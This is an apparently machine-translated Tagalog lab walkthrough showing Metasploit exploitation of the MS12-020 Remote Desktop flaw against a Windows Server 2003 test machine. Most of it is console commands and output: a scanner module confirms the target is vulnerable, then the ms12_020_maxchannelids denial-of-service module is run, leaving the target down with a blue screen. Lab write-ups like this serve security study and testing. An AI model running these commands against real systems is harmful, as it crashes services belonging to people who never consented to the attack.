Mga Bintana

Ang proseso ng paggamit ng metasploit (MSF) upang pagsamantalahan ang ms12-020 kahinaan ng mga bintana

Process Using Metasploit Exploit Ms12 020 Vulnerability Windows



Paunang salita

Nagpadala ang umaatake ng isang serye ng mga espesyal na gumawa ng mga RDP packet sa apektadong sistema. Ang kahinaan na ito ay maaaring maging sanhi ng pagtanggi ng atake sa serbisyo o payagan ang pagpapatupad ng remote code. Bilang default, ang Remote Desktop Protocol (RDP, default port 3389) ay hindi pinagana sa anumang operating system ng Windows. Ang mga system na walang pinagana ang RDP ay hindi nanganganib. Ang eksperimentong ito ay sanhi ng pag-atake ng DOS sa target na system.

0x01 pang-eksperimentong kapaligiran

Attack machine: kali linux
ip: 192.168.8.130
Target na makina: windows server 2003 Enterprise x64 SP2
ip: 192.168.8.129



0x02 kahinaan sa pagpapatunay

Gumamit ng module ng msf: auxiliary / scanner / rdp / ms12_020_check upang mapatunayan kung ang target machine ay may kahinaan na ito



msf > use auxiliary/scanner/rdp/ms12_020_check msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129 msf auxiliary(ms12_020_check) > info Name: MS12-020 Microsoft Remote Desktop Checker Module: auxiliary/scanner/rdp/ms12_020_check License: Metasploit Framework License (BSD) Rank: Normal Provided by: Royce Davis 'R3dy' Brandon McCann 'zeknox' Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.8.129 yes The target address range or CIDR identifier RPORT 3389 yes Remote port running RDP (TCP) THREADS 100 yes The number of concurrent threads Description: This module checks a range of hosts for the MS12-020 vulnerability. This does not cause a DoS on the target. References: https://cvedetails.com/cve/CVE-2012-0002/ https://technet.microsoft.com/en-us/library/security/MS12-020 http://technet.microsoft.com/en-us/security/bulletin/ms12-020 https://www.exploit-db.com/exploits/18606 https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

Matapos ang pagtakbo, ipinapakita nito na ang target na system ay mayroong kahinaan na ito:



msf auxiliary(ms12_020_check) > run [+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

0x03 pagsasamantala

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.8.129 yes The target address RPORT 3389 yes The target port (TCP) msf auxiliary(ms12_020_maxchannelids) > run [*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS [*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent [*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status... [+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down [*] Auxiliary module execution completed

Matapos patakbuhin ang module, ang target na system windows server 2003 BSOD:
imahe